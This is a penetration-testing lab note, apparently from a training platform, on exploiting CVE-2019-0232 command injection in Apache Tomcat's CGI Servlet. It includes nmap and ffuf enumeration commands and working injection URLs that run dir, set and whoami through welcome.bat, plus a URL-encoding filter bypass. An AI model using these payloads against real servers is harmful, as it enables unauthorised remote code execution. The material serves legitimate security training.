17.-Attacking-tomcat-cgi

1. Vulnerability Overview

CVE-2019-0232 - Remote Code Execution (RCE)

  • Description: Allows remote code execution due to improper input validation in the CGI Servlet when enableCmdLineArguments is set to true.

  • Affected Versions:

    • Tomcat 9.0.0.M1 to 9.0.17

    • Tomcat 8.5.0 to 8.5.39

    • Tomcat 7.0.0 to 7.0.93

  • Cause:

    • The CGI Servlet fails to properly sanitize user-supplied input from the query string, leading to command injection.

2. Enumeration

Nmap Scan

Identify open ports and running services, particularly Apache Tomcat.

nmap -p- -sC -Pn 10.129.204.227 --open

CGI Script Discovery (ffuf)

Discover CGI scripts using directory fuzzing.

ffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.129.204.227:8080/cgi/FUZZ.bat

This command fuzzes for CGI scripts with the .bat extension and may reveal welcome.bat.

3. Exploitation

Basic Command Injection

Execute the dir command to list files.

http://10.129.204.227:8080/cgi/welcome.bat?&dir

Retrieve Environment Variables

Check for useful system environment variables.

http://10.129.204.227:8080/cgi/welcome.bat?&set

This can reveal critical information, such as the PATH variable being unset.

Hardcoded Path Execution (whoami)

Attempt to execute whoami.exe by specifying its full path.

http://10.129.204.227:8080/cgi/welcome.bat?&c:\windows\system32\whoami.exe

This may fail if special characters are filtered.

URL Encoding Bypass

Bypass character filtering using URL encoding.

http://10.129.204.227:8080/cgi/welcome.bat?&c%3A%5Cwindows%5Csystem32%5Cwhoami.exe

This allows execution of whoami.exe despite input restrictions.

4. Key Considerations

  • The enableCmdLineArguments setting must be enabled for this exploit to work.

  • The & character is used to separate commands in the injection.

  • If the PATH environment variable is unset, commands must be executed with their full path.

  • URL encoding can help bypass character filtering.

  • Only test on systems you have explicit permission to assess.

  • Replace IP addresses, ports, and URLs with your specific target information.

5. Commands Summary

# Nmap Scan - Identify open ports
nmap -p- -sC -Pn 10.129.204.227 --open

# ffuf - Discover CGI scripts
ffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.129.204.227:8080/cgi/FUZZ.bat

# Basic command injection (dir)
http://10.129.204.227:8080/cgi/welcome.bat?&dir

# Retrieve environment variables
http://10.129.204.227:8080/cgi/welcome.bat?&set

# Execute whoami using hardcoded path
http://10.129.204.227:8080/cgi/welcome.bat?&c:\windows\system32\whoami.exe

# URL encoded path execution
http://10.129.204.227:8080/cgi/welcome.bat?&c%3A%5Cwindows%5Csystem32%5Cwhoami.exe
Previous5. Common Gateway InterfacesNext18.-Attacking-cgi-applications-shellshock

Last updated